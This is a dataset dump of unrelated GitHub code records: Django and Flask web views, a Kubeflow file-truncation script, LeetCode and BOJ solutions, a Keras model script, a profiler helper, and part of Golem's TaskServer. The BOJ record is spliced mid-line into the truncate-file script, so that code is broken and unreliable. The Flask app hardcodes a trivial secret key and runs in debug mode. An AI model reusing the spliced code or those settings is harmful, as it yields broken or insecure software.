logout(request)\n return HttpResponse(status=200)\n\n\ndef login_form(request):\n context = {'data': 'none'}\n return render_to_response('login.html', locals(), context_instance=RequestContext(request))\n\n\ndef friend_page(request):\n context = {'data': 'none'}\n return render_to_response('friend_page.html', locals(), context_instance=RequestContext(request))\n\n\ndef admin_page(request):\n context = {'data': 'none'}\n return render_to_response('admin_page.html', locals(), context_instance=RequestContext(request))\n\n\ndef _get_post_param(param=None, request=None):\n try:\n body = request.body.decode('utf-8')\n data = loads(body)\n return data.get(param, '')\n except ValueError:\n return None","repo_name":"joejuzl/friendmap","sub_path":"friendmap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10286249786","text":"# BOJ 17298 Next Greater Element(오큰수)\nn = int(input())\narr = [*map(int, input().split())]\nres = [-1 for _ in range(n)]\nstack = [0]\ni = 1\nwhile stack and i args.max_rows_value:\n break\n output_file.write(line)\n if count > 0:\n count -= 1\n print(f'Truncated {args.input_file_path} after {count} rows.')\nexcept Exception as ex:\n raise RuntimeError(f'Error truncating file {args.input_file_path}: {ex}')\n","repo_name":"ricardo-arruda/examples","sub_path":"pipelines/run-pipelines-on-kubeflow-pipelines/components/source/truncate-file/src/truncate-file.py","file_name":"truncate-file.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"22650560409","text":"from google_hash_code_rcs.classes import Binary, Feature, Engineer, Service\n\ndef test_classes() -> None:\n \"\"\"Empty test function\n \"\"\"\n b = Binary()\n e = Engineer(id=1)\n f = Feature(services=[], users=100, difficulty=3)\n s = Service(binary=[])\n\n assert 1 == 1\n","repo_name":"nicolas-goeman/google-hash-code-RCS","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35129556483","text":"\r\nfrom flask import Flask, flash, redirect, render_template,request,session, url_for\r\nfrom model import Model\r\n\r\napp = Flask(__name__) \r\napp.secret_key = \"1234567890\"\r\ndb = Model()\r\n\r\n@app.route('/detail/<id>')\r\ndef detail(id):\r\n data = db.readById(id)\r\n session['detail'] = id\r\n return render_template('detail.html', data=data)\r\n\r\n # Read data\r\n@app.route('/')\r\ndef index():\r\n data=db.read()\r\n return render_template('index.html', data=data)\r\n\r\n@app.route('/formsiswa')\r\ndef tambah():\r\n return render_template('tambah.html')\r\n\r\n # Add data\r\n@app.route('/tambahdata', methods=['POST','GET'])\r\ndef tambahdata():\r\n if request.method=='POST' and request.form['submit']:\r\n student_id = request.form['student_id']\r\n student_name = request.form['student_name']\r\n student_class = request.form['student_class']\r\n student_gender = request.form['student_gender']\r\n favorite_course = request.form['favorite_course']\r\n reason = request.form['reason']\r\n\r\n if db.create(student_id, student_name, student_class, student_gender, favorite_course, reason):\r\n flash('Data Berhasil Ditambahkan!')\r\n\r\n else:\r\n flash('Data Tidak Berhasil Ditambahkan!') \r\n \r\n return redirect(url_for('index'))\r\n \r\n 
else:\r\n return redirect('index')\r\n\r\n # Update data\r\n@app.route('/update/<id>')\r\ndef update(id):\r\n data = db.readById(id)\r\n session['update'] = id\r\n return render_template('update.html', data=data)\r\n\r\n@app.route('/updatedata', methods = ['GET', 'POST'])\r\ndef updatedata():\r\n if request.method == 'POST' and request.form['update']:\r\n student_id = request.form['student_id']\r\n student_name = request.form['student_name']\r\n student_class = request.form['student_class']\r\n student_gender = request.form['student_gender']\r\n favorite_course = request.form['favorite_course']\r\n reason = request.form['reason']\r\n\r\n if db.update(student_id, student_name, student_class, student_gender, favorite_course, reason, session['update']):\r\n flash('Data Berhasil Diperbarui!')\r\n else:\r\n flash('Data Tidak Berhasil Diperbarui!')\r\n return redirect (url_for('index'))\r\n\r\n # Delete data\r\n@app.route('/hapus/<id>', methods = ['GET', 'POST'])\r\ndef hapus(id):\r\n if request.method == 'GET':\r\n if db.delete(id):\r\n flash('Data Berhasil Dihapus!')\r\n else:\r\n flash('Data Tidak Berhasil Dihapus!')\r\n return redirect (url_for('index'))\r\n \r\nif __name__=='__main__':\r\n app.run(debug=True)","repo_name":"Ryrisma13/Uciha","sub_path":"aap.py","file_name":"aap.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32754923961","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom argparse import ArgumentParser\nfrom fashion_code.constants import num_classes, paths\nfrom fashion_code.generators import SequenceFromDisk\nfrom fashion_code.util import create_submission\nfrom keras.applications.xception import preprocess_input\nfrom keras.layers import Dense, Dropout, Input\nfrom keras.models import Model, load_model\nfrom keras.optimizers import Adam\nfrom keras.utils import multi_gpu_model\nfrom os.path import join\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\nimport numpy as np\nimport sys\nimport tensorflow as tf\n\n\ndef rf_transformer():\n return RandomForestClassifier(n_estimators=200, n_jobs=8, verbose=1)\n\n\ndef nn_transformer():\n inputs = Input(shape=(num_classes,))\n x = inputs\n for i in range(4):\n x = Dense(num_classes*(2+i), activation='relu',\n name='trans_dense_{}'.format(i),\n kernel_initializer='he_normal')(x)\n x = Dropout(.3, name='trans_dropout_{}'.format(i))(x)\n outputs = Dense(num_classes, activation='sigmoid', name='trans_out',\n kernel_initializer='he_normal')(x)\n transformer = Model(inputs, outputs)\n\n optimizer = Adam(decay=1e-5)\n transformer.compile(optimizer=optimizer, loss='binary_crossentropy')\n return transformer\n\n\ndef generate_data(model, batch_size):\n train_gen = SequenceFromDisk('train', batch_size, (299, 299),\n preprocessfunc=preprocess_input)\n valid_gen = SequenceFromDisk('validation', batch_size, (299, 299),\n preprocessfunc=preprocess_input)\n\n x_train = model.predict_generator(train_gen,\n use_multiprocessing=True,\n workers=8,\n verbose=1)\n x_valid = model.predict_generator(valid_gen,\n use_multiprocessing=True,\n workers=8,\n verbose=1)\n y_train = np.load(join(paths['data'], 'labels_train.npy'))\n y_valid = np.load(join(paths['data'], 'labels_validation.npy'))\n\n return x_train, x_valid, y_train, y_valid\n\n\nif __name__ == '__main__':\n p = ArgumentParser('Predict transformations for a given neural network')\n p.add_argument('filename', type=str,\n help='The saved model to 
create initial predictions')\n p.add_argument('--save-filename', type=str,\n help='Model to train transformer on top of')\n p.add_argument('--epochs', type=int, default=10, help='Epochs')\n p.add_argument('--batch-size', type=int, default=128, help='Batch size')\n p.add_argument('--create-submission', action='store_true')\n args = p.parse_args()\n\n batch_size = args.batch_size\n fname = join(paths['models'], args.filename)\n save_filename = args.save_filename\n model = multi_gpu_model(load_model(fname), cpu_relocation=True)\n threshold = .5\n epochs = args.epochs\n\n x_train, x_valid, y_train, y_valid = generate_data(model, batch_size)\n\n # TODO: add random forest classifier\n\n transformer = nn_transformer()\n transformer.fit(x_train, y_train,\n validation_data=(x_valid, y_valid),\n epochs=epochs,\n verbose=1)\n transformer.save(join(paths['models'], save_filename))\n\n valid_preds = transformer.predict(x_valid,\n batch_size=batch_size,\n verbose=1) > threshold\n score = f1_score(y_valid, valid_preds, average='micro')\n print('F1 score on validation: {:.4f}'.format(score))\n\n if args.create_submission:\n print('Creating submission...')\n test_gen = SequenceFromDisk('test', batch_size, (299, 299),\n preprocessfunc=preprocess_input)\n initial_preds = model.predict_generator(test_gen,\n use_multiprocessing=True,\n workers=8,\n verbose=1)\n y_pred = transformer.predict(initial_preds,\n batch_size=batch_size,\n verbose=1)\n create_submission(y_pred, save_filename)\n\n sys.exit(0)\n","repo_name":"KDercksen/hunter2_fashion","sub_path":"scripts/prediction_transformer.py","file_name":"prediction_transformer.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"17793576","text":"# video 23: run length encoding : aaaavv -> a4v2\n# given a string , just compress it with number\ndef sol(lets):\n arr = []\n cnt = 1\n for i in range(1, len(lets)):\n clet = lets[i]\n nlet = lets[i - 1]\n \n if clet != nlet:\n arr.append(nlet)\n arr.append(str(cnt))\n cnt = 0\n\n cnt += 1\n arr.append(lets[len(lets) - 1])\n arr.append(str(cnt))\n \n return \"\".join(arr)\n\n\n# print(sol(\"1111av\"))\n\n# time O(n) | space O(n)\n","repo_name":"xrayapu/algoExpertSolution","sub_path":"easy/vi_23_run_lenght_encoding.py","file_name":"vi_23_run_lenght_encoding.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26076399145","text":"import timeit as timeit_\n\n__all__ = [\n 'Profiler',\n]\n\n\nclass Profiler:\n\n def __init__(self, globals):\n self._globals = globals\n\n def timeit(self, *args, globals=None, number=timeit_.default_number):\n globals = globals or self._globals\n for code in args:\n print('>>>', code)\n dt = timeit_.timeit(code, globals=globals, number=number)\n print(f'{dt:.1f}s')\n\n def profile(self, f):\n import cProfile\n import os\n import shutil\n import subprocess\n import tempfile\n prof = cProfile.Profile()\n prof.runcall(f)\n tmpdir = tempfile.mkdtemp()\n proffile = os.path.join(tmpdir, 'profile')\n prof.dump_stats(proffile)\n cgraphfile = os.path.join(tmpdir, 'callgraph')\n subprocess.run(['pyprof2calltree', '-k', '-i', proffile,\n '-o', cgraphfile], check=True)\n","repo_name":"IBM/ULKB","sub_path":"tests/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"} 
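A minimal usage sketch for the Profiler class in the IBM/ULKB record above, under stated assumptions: the import path is taken from its sub_path "tests/profiler.py", the timed expression is purely illustrative, and Profiler.profile() additionally needs pyprof2calltree plus a call-graph viewer installed.
from tests.profiler import Profiler  # assumed import path

prof = Profiler(globals())
# timeit() prints each expression after '>>>' and the elapsed seconds.
prof.timeit('sum(range(10_000))', number=10_000)
# profile() runs the callable under cProfile, dumps the stats to a temp
# directory and opens the call graph via `pyprof2calltree -k`.
prof.profile(lambda: sorted(range(100_000), reverse=True))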
+{"seq_id":"31028888145","text":"from typing import List\n#3.5之后引入类型限定var:type,返回值->type\nclass Solution:\n def prefixesDivBy5(self, A: List[int]) -> List[bool]:\n n = len(A)\n res = [0 for x in range(0,n)]\n cur = 0\n for i in range(n):\n cur = cur <<1\n if(cur >= 10):\n cur -= 10\n cur += A[i]\n if cur % 5 == 0:\n res[i] = True \n return res","repo_name":"lock19960613/SCL","sub_path":"Daily/PY/Leetcode1018-能被5整除的二进制前缀.py","file_name":"Leetcode1018-能被5整除的二进制前缀.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12600440737","text":"# 给定两个大小分别为 m 和 n 的正序(从小到大)数组 nums1 和 nums2。请你找出并返回这两个正序数组的 中位数 。\n#\n#\n#\n# 示例 1:\n#\n#\n# 输入:nums1 = [1,3], nums2 = [2]\n# 输出:2.00000\n# 解释:合并数组 = [1,2,3] ,中位数 2\n#\n#\n# 示例 2:\n#\n#\n# 输入:nums1 = [1,2], nums2 = [3,4]\n# 输出:2.50000\n# 解释:合并数组 = [1,2,3,4] ,中位数 (2 + 3) / 2 = 2.5\n#\n#\n# 示例 3:\n#\n#\n# 输入:nums1 = [0,0], nums2 = [0,0]\n# 输出:0.00000\n#\n#\n# 示例 4:\n#\n#\n# 输入:nums1 = [], nums2 = [1]\n# 输出:1.00000\n#\n#\n# 示例 5:\n#\n#\n# 输入:nums1 = [2], nums2 = []\n# 输出:2.00000\n#\n#\n#\n#\n# 提示:\n#\n#\n# nums1.length == m\n# nums2.length == n\n# 0 <= m <= 1000\n# 0 <= n <= 1000\n# 1 <= m + n <= 2000\n# -106 <= nums1[i], nums2[i] <= 106\n#\n#\n#\n#\n# 进阶:你能设计一个时间复杂度为 O(log (m+n)) 的算法解决此问题吗?\n# Related Topics 数组 二分查找 分治算法\n# 👍 3970 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution(object):\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n if len(nums1) > len(nums2):\n return self.findMedianSortedArrays(nums2, nums1)\n\n infinty = 2 ** 40\n m, n = len(nums1), len(nums2)\n left, right = 0, m\n # median1:前一部分的最大值\n # median2:后一部分的最小值\n median1, median2 = 0, 0\n\n while left <= right:\n # 前一部分包含 nums1[0 .. i-1] 和 nums2[0 .. j-1]\n # // 后一部分包含 nums1[i .. m-1] 和 nums2[j .. 
n-1]\n i = (left + right) // 2\n j = (m + n + 1) // 2 - i\n\n # nums_im1, nums_i, nums_jm1, nums_j denote nums1[i-1], nums1[i], nums2[j-1], nums2[j] respectively\n nums_im1 = (-infinty if i == 0 else nums1[i - 1])\n nums_i = (infinty if i == m else nums1[i])\n nums_jm1 = (-infinty if j == 0 else nums2[j - 1])\n nums_j = (infinty if j == n else nums2[j])\n\n if nums_im1 <= nums_j:\n median1, median2 = max(nums_im1, nums_jm1), min(nums_i, nums_j)\n left = i + 1\n else:\n right = i - 1\n\n return (median1 + median2) / 2 if (m + n) % 2 == 0 else median1\n\n\nif __name__ == '__main__':\n result = Solution().findMedianSortedArrays([1, 3], [2])\n print(result)\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"sjr7/leetcode","sub_path":"python/problems/[4]寻找两个正序数组的中位数.py","file_name":"[4]寻找两个正序数组的中位数.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71040031263","text":"# pylint: disable=too-many-instance-attributes,too-many-public-methods,\r\n# pylint: disable=too-many-lines\r\n\r\nimport asyncio\r\nimport datetime\r\nimport functools\r\nimport itertools\r\nimport logging\r\nimport os\r\nimport shutil\r\nimport time\r\nimport weakref\r\nfrom enum import Enum\r\nfrom pathlib import Path\r\nfrom typing import (\r\n Any,\r\n Dict,\r\n List,\r\n Optional,\r\n Union,\r\n Set,\r\n Tuple,\r\n TYPE_CHECKING,\r\n)\r\nfrom dataclasses import dataclass, field\r\n\r\nfrom golem_messages import exceptions as msg_exceptions\r\nfrom golem_messages import message\r\nfrom golem_messages.datastructures import tasks as dt_tasks\r\nfrom golem_messages.datastructures.masking import Mask\r\nfrom pydispatch import dispatcher\r\nfrom twisted.internet import defer\r\nfrom twisted.internet.defer import inlineCallbacks, Deferred, \\\r\n TimeoutError as DeferredTimeoutError\r\n\r\nfrom apps.appsmanager import AppsManager\r\nfrom apps.core.task.coretask import CoreTask\r\nfrom golem import constants as gconst\r\nfrom golem.apps import manager as app_manager\r\nfrom golem.clientconfigdescriptor import ClientConfigDescriptor\r\nfrom golem.core.common import (\r\n short_node_id,\r\n deadline_to_timeout,\r\n get_log_dir,\r\n get_timestamp_utc,\r\n)\r\nfrom golem.core.deferred import (\r\n asyncio_main_loop,\r\n deferred_from_future,\r\n sync_wait,\r\n)\r\nfrom golem.core.variables import MAX_CONNECT_SOCKET_ADDRESSES, ENV_TASK_API_DEV\r\nfrom golem.environments.environment import (\r\n Environment as OldEnv,\r\n SupportStatus,\r\n UnsupportReason,\r\n)\r\nfrom golem.envs import Environment as NewEnv\r\nfrom golem.envs.default import (\r\n register_environments,\r\n register_built_in_repositories,\r\n)\r\nfrom golem.marketplace import ProviderPricing\r\nfrom golem.model import TaskPayment\r\nfrom golem.network.hyperdrive.client import HyperdriveAsyncClient\r\nfrom golem.network.transport import msg_queue\r\nfrom golem.network.transport.network import ProtocolFactory, SessionFactory\r\nfrom golem.network.transport.tcpnetwork import (\r\n TCPNetwork, SocketAddress, SafeProtocol)\r\nfrom golem.network.transport.tcpserver import (\r\n PendingConnectionsServer,\r\n)\r\nfrom golem.ranking.helper.trust import Trust\r\nfrom golem.ranking.manager.database_manager import (\r\n update_requestor_paid_sum,\r\n update_requestor_assigned_sum,\r\n update_requestor_efficiency,\r\n)\r\nfrom golem.resource.resourcehandshake import ResourceHandshake\r\nfrom golem.resource.resourcemanager import ResourceManager\r\nfrom golem.rpc 
import utils as rpc_utils\r\nfrom golem.task import helpers as task_helpers\r\nfrom golem.task import timer\r\nfrom golem.task.acl import get_acl, setup_acl, AclRule, _DenyAcl as DenyAcl\r\nfrom golem.task.exceptions import ComputationInProgress\r\nfrom golem.task.benchmarkmanager import AppBenchmarkManager, BenchmarkManager\r\nfrom golem.task.envmanager import EnvironmentManager\r\nfrom golem.task.helpers import calculate_subtask_payment\r\nfrom golem.task.requestedtaskmanager import RequestedTaskManager\r\nfrom golem.task.server.whitelist import DockerWhitelistRPC\r\nfrom golem.task.taskbase import AcceptClientVerdict\r\nfrom golem.task.taskconnectionshelper import TaskConnectionsHelper\r\nfrom golem.task.taskstate import TaskOp\r\nfrom golem.tools import memoryhelper\r\nfrom golem.utils import decode_hex\r\nfrom .server import concent\r\nfrom .server import helpers\r\nfrom .server import queue_ as srv_queue\r\nfrom .server import resources\r\nfrom .server import verification as srv_verification\r\nfrom .taskcomputer import TaskComputerAdapter\r\nfrom .taskkeeper import TaskHeaderKeeper\r\nfrom .taskmanager import TaskManager\r\nfrom .tasksession import TaskSession\r\n\r\nif TYPE_CHECKING:\r\n from golem_messages.datastructures import p2p as dt_p2p # noqa pylint: disable=unused-import,ungrouped-imports\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\ntmp_cycler = itertools.cycle(list(range(550)))\r\n\r\n\r\nclass TaskServer(\r\n PendingConnectionsServer,\r\n resources.TaskResourcesMixin,\r\n srv_queue.TaskMessagesQueueMixin,\r\n srv_verification.VerificationMixin,\r\n DockerWhitelistRPC,\r\n):\r\n\r\n BENCHMARK_TIMEOUT = 60 # s\r\n RESULT_SHARE_TIMEOUT = 3600 * 24 * 7 * 2 # s\r\n\r\n # pylint: disable=too-many-arguments,too-many-locals,too-many-statements\r\n def __init__(\r\n self,\r\n node,\r\n config_desc: ClientConfigDescriptor,\r\n client,\r\n use_ipv6=False,\r\n use_docker_manager=True,\r\n task_archiver=None,\r\n apps_manager=AppsManager(),\r\n task_finished_cb=None\r\n ) -> None:\r\n DockerWhitelistRPC.__init__(self)\r\n\r\n self.client = client\r\n self.keys_auth = client.keys_auth\r\n self.config_desc = config_desc\r\n\r\n Path(self.get_task_computer_root()).mkdir(parents=True, exist_ok=True)\r\n\r\n runtime_logs_dir = get_log_dir(client.datadir)\r\n new_env_manager = EnvironmentManager(runtime_logs_dir)\r\n register_built_in_repositories()\r\n task_api_dev_mode = ENV_TASK_API_DEV in os.environ \\\r\n and os.environ[ENV_TASK_API_DEV] == \"1\"\r\n register_environments(\r\n work_dir=self.get_task_computer_root(),\r\n env_manager=new_env_manager,\r\n dev_mode=task_api_dev_mode,\r\n )\r\n\r\n self.app_manager = app_manager.AppManager(self.get_app_dir())\r\n\r\n self.node = node\r\n self.task_archiver = task_archiver\r\n self.task_keeper = TaskHeaderKeeper(\r\n old_env_manager=client.environments_manager,\r\n new_env_manager=new_env_manager,\r\n node=self.node,\r\n min_price=config_desc.min_price,\r\n task_archiver=task_archiver)\r\n self.task_manager = TaskManager(\r\n self.node,\r\n self.keys_auth,\r\n root_path=TaskServer.__get_task_manager_root(client.datadir),\r\n config_desc=config_desc,\r\n tasks_dir=os.path.join(client.datadir, 'tasks'),\r\n apps_manager=apps_manager,\r\n finished_cb=task_finished_cb,\r\n )\r\n\r\n self.requested_task_manager = RequestedTaskManager(\r\n app_manager=self.app_manager,\r\n env_manager=new_env_manager,\r\n public_key=self.keys_auth.public_key,\r\n root_path=Path(TaskServer.__get_task_manager_root(client.datadir)),\r\n )\r\n 
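# Hedged aside (added comment, not in the original source): the ResourceManager\r\n # created below wraps the Hyperdrive async client used to share task resources\r\n # between nodes; its RPC port and address come from the ClientConfigDescriptor.\r\n 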
self.new_resource_manager = ResourceManager(HyperdriveAsyncClient(\r\n config_desc.hyperdrive_rpc_port,\r\n config_desc.hyperdrive_rpc_address,\r\n ))\r\n benchmarks = self.task_manager.apps_manager.get_benchmarks()\r\n self.benchmark_manager = BenchmarkManager(\r\n node_name=config_desc.node_name,\r\n task_server=self,\r\n root_path=self.get_task_computer_root(),\r\n benchmarks=benchmarks\r\n )\r\n self.app_benchmark_manager = AppBenchmarkManager(\r\n env_manager=new_env_manager,\r\n root_path=Path(self.get_task_computer_root()),\r\n )\r\n self.task_computer = TaskComputerAdapter(\r\n task_server=self,\r\n env_manager=new_env_manager,\r\n use_docker_manager=use_docker_manager,\r\n finished_cb=task_finished_cb)\r\n deferred = self._change_task_computer_config(\r\n config_desc=config_desc,\r\n run_benchmarks=self.benchmark_manager.benchmarks_needed()\r\n )\r\n try:\r\n sync_wait(deferred, self.BENCHMARK_TIMEOUT)\r\n except DeferredTimeoutError:\r\n logger.warning('Benchmark computation timed out')\r\n\r\n self.task_connections_helper = TaskConnectionsHelper()\r\n self.task_connections_helper.task_server = self\r\n self.sessions: Dict[str, TaskSession] = {}\r\n self.task_sessions_incoming: weakref.WeakSet = weakref.WeakSet()\r\n\r\n self.max_trust = 1.0\r\n self.min_trust = 0.0\r\n\r\n self.last_messages: List[Any] = []\r\n\r\n self.results_to_send: Dict[str, Any] = {}\r\n self.failures_to_send: Dict[str, Any] = {}\r\n\r\n self.use_ipv6 = use_ipv6\r\n\r\n self.forwarded_session_request_timeout = \\\r\n config_desc.waiting_for_task_session_timeout\r\n self.forwarded_session_requests: Dict[str, Any] = {}\r\n self.acl = get_acl(\r\n self.client, max_times=config_desc.disallow_id_max_times)\r\n self.acl_ip = DenyAcl(\r\n self.client, max_times=config_desc.disallow_ip_max_times)\r\n self.resource_handshakes: Dict[str, ResourceHandshake] = {}\r\n self.requested_tasks: Set[str] = set()\r\n self._last_task_request_time: float = time.time()\r\n\r\n network = TCPNetwork(\r\n ProtocolFactory(SafeProtocol, self, SessionFactory(TaskSession)),\r\n use_ipv6)\r\n PendingConnectionsServer.__init__(self, config_desc, network)\r\n srv_queue.TaskMessagesQueueMixin.__init__(self)\r\n # instantiate ReceivedMessageHandler connected to self\r\n # to register in golem.network.concent.handlers_library\r\n from golem.network.concent import \\\r\n received_handler as concent_received_handler\r\n self.concent_handler = \\\r\n concent_received_handler.TaskServerMessageHandler(self)\r\n\r\n dispatcher.connect(\r\n self.income_listener,\r\n signal='golem.income'\r\n )\r\n dispatcher.connect(\r\n self.finished_subtask_listener,\r\n signal='golem.taskcomputer'\r\n )\r\n dispatcher.connect(\r\n self.finished_task_listener,\r\n signal='golem.taskmanager'\r\n )\r\n\r\n def sync_network(self, timeout=None):\r\n if timeout is None:\r\n timeout = self.config_desc.task_session_timeout\r\n jobs = (\r\n functools.partial(\r\n super().sync_network,\r\n timeout=timeout,\r\n ),\r\n self._sync_pending,\r\n self._send_waiting_results,\r\n self._request_random_task,\r\n self.task_computer.check_timeout,\r\n self.task_connections_helper.sync,\r\n self._sync_forwarded_session_requests,\r\n self.__remove_old_tasks,\r\n functools.partial(\r\n concent.process_messages_received_from_concent,\r\n concent_service=self.client.concent_service,\r\n ),\r\n self.sweep_sessions,\r\n self.connect_to_nodes,\r\n )\r\n\r\n for job in jobs:\r\n try:\r\n job()\r\n except Exception: # pylint: disable=broad-except\r\n logger.exception(\"TaskServer.sync_network 
job %r failed\", job)\r\n\r\n if next(tmp_cycler) == 0:\r\n logger.debug('TASK SERVER TASKS DUMP: %r', self.task_manager.tasks)\r\n logger.debug('TASK SERVER TASKS STATES: %r',\r\n self.task_manager.tasks_states)\r\n\r\n @inlineCallbacks\r\n def pause(self):\r\n super().pause()\r\n yield CoreTask.VERIFICATION_QUEUE.pause()\r\n self.disconnect()\r\n self.quit()\r\n\r\n def resume(self):\r\n super().resume()\r\n CoreTask.VERIFICATION_QUEUE.resume()\r\n\r\n @inlineCallbacks\r\n def quit(self):\r\n try:\r\n future = self.requested_task_manager.stop()\r\n yield deferred_from_future(asyncio.wait_for(future, timeout=30.))\r\n except asyncio.TimeoutError:\r\n logger.error(\"RequestedTaskManager.stop has timed out\")\r\n\r\n self.task_computer.quit()\r\n\r\n def is_task_single_core(self, th: dt_tasks.TaskHeader) -> bool:\r\n env = self.get_environment_by_id(th.environment)\r\n if env is not None and isinstance(env, OldEnv):\r\n return env.is_single_core()\r\n return False\r\n\r\n def get_environment_by_id(\r\n self,\r\n env_id: str\r\n ) -> Optional[Union[OldEnv, NewEnv]]:\r\n \"\"\" Looks for the requested env_id in the new, then the old env_manager.\r\n Returns None when the environment is not found. \"\"\"\r\n keeper = self.task_keeper\r\n if keeper.new_env_manager.enabled(env_id):\r\n return keeper.new_env_manager.environment(env_id)\r\n return keeper.old_env_manager.get_environment_by_id(env_id)\r\n\r\n def request_task_by_id(self, task_id: str) -> None:\r\n \"\"\" Requests task possibly after successful resource handshake. \"\"\"\r\n try:\r\n task_header = self.task_keeper.task_headers[task_id]\r\n except KeyError:\r\n logger.debug(\"Task missing in TaskKeeper. task_id=%s\", task_id)\r\n return\r\n self._request_task(task_header)\r\n\r\n def _request_random_task(self) -> None:\r\n \"\"\" If there is no task currently computing and time elapsed from last\r\n request exceeds the configured request interval, choose a random\r\n task from the network to compute on our machine. \"\"\"\r\n\r\n logger.debug(\"_request_random_task... \")\r\n if time.time() - self._last_task_request_time \\\r\n < self.config_desc.task_request_interval:\r\n logger.debug(\"_request_random_task: interval not yet passed\")\r\n return\r\n\r\n if (not self.task_computer.compute_tasks) \\\r\n or (not self.task_computer.runnable):\r\n logger.debug(\r\n \"_request_random_task: task computer disabled or not ready\")\r\n return\r\n\r\n if not self.task_computer.can_take_work():\r\n logger.debug(\"_request_random_task: task computer still busy\")\r\n return\r\n\r\n compatible_tasks = self.task_computer.compatible_tasks(\r\n set(self.task_keeper.supported_tasks))\r\n\r\n task_header = self.task_keeper.get_task(\r\n exclude=self.requested_tasks, supported_tasks=compatible_tasks)\r\n\r\n if task_header is None:\r\n logger.debug(\r\n \"_request_random_task: no suitable task found. 
\"\r\n \"exclude=%s, supported_tasks=%s\",\r\n self.requested_tasks,\r\n compatible_tasks,\r\n )\r\n return\r\n\r\n logger.debug(\r\n \"_request_random_task: got task header: %s\", task_header)\r\n\r\n self._last_task_request_time = time.time()\r\n self.task_computer.stats.increase_stat('tasks_requested')\r\n\r\n def _request_task_error(e):\r\n logger.error(\r\n \"Failed to request task: task_id=%r, exception=%r\",\r\n task_header.task_id,\r\n e\r\n )\r\n # Unyielded deferred, fire and forget requesting a new task\r\n deferred = self._request_task(task_header)\r\n deferred.addErrback(_request_task_error) # pylint: disable=no-member\r\n\r\n @inlineCallbacks\r\n # pylint: disable=too-many-return-statements,too-many-branches\r\n def _request_task(self, theader: dt_tasks.TaskHeader) -> Deferred:\r\n try:\r\n supported = self.should_accept_requestor(theader.task_owner.key)\r\n if self.config_desc.min_price > theader.max_price:\r\n supported = supported.join(SupportStatus.err({\r\n UnsupportReason.MAX_PRICE: theader.max_price}))\r\n\r\n if (\r\n self.client.concent_service.enabled\r\n and self.client.concent_service.required_as_provider\r\n and not theader.concent_enabled\r\n ):\r\n supported = supported.join(\r\n SupportStatus.err({\r\n UnsupportReason.CONCENT_REQUIRED: True,\r\n }),\r\n )\r\n\r\n # prepare env for performance, should always exist at this point\r\n env_id = theader.environment\r\n env = self.get_environment_by_id(env_id)\r\n if env is None:\r\n supported = supported.join(\r\n SupportStatus.err(\r\n {UnsupportReason.ENVIRONMENT_MISSING: env_id}\r\n )\r\n )\r\n\r\n if not supported.is_ok():\r\n logger.debug(\r\n \"Support status. task_id=%s supported=%s\",\r\n theader.task_id,\r\n supported,\r\n )\r\n if self.task_archiver:\r\n self.task_archiver.add_support_status(\r\n theader.task_id,\r\n supported,\r\n )\r\n return None\r\n\r\n num_subtasks = 1\r\n # Check performance\r\n if isinstance(env, OldEnv):\r\n benchmark_result = env.get_benchmark_result()\r\n benchmark_score = benchmark_result.performance\r\n benchmark_cpu_usage = benchmark_result.cpu_usage\r\n if env.is_single_core():\r\n num_subtasks = self.task_computer.free_cores\r\n if num_subtasks == 0:\r\n return None\r\n else: # NewEnv\r\n try:\r\n future = asyncio.run_coroutine_threadsafe(\r\n self.app_benchmark_manager.get(\r\n theader.environment,\r\n theader.environment_prerequisites),\r\n loop=asyncio_main_loop())\r\n app_benchmark = yield Deferred.fromFuture(future)\r\n except ComputationInProgress as error:\r\n logger.debug(\r\n \"Not requesting task_id=%s: %r\",\r\n theader.task_id,\r\n error)\r\n return None\r\n except Exception: # pylint: disable=broad-except\r\n logger.exception(\"Cannot retrieve benchmark score\")\r\n return None\r\n benchmark_score = app_benchmark.score\r\n benchmark_cpu_usage = app_benchmark.cpu_usage\r\n\r\n # Check handshake\r\n handshake = self.resource_handshakes.get(theader.task_owner.key)\r\n if not handshake:\r\n logger.debug(\r\n \"Starting handshake. key_id=%r, task_id=%r\",\r\n theader.task_owner.key,\r\n theader.task_id,\r\n )\r\n self.start_handshake(\r\n key_id=theader.task_owner.key,\r\n task_id=theader.task_id,\r\n )\r\n return None\r\n handshake.task_id = theader.task_id\r\n if not handshake.success():\r\n logger.debug(\r\n \"Handshake still in progress. 
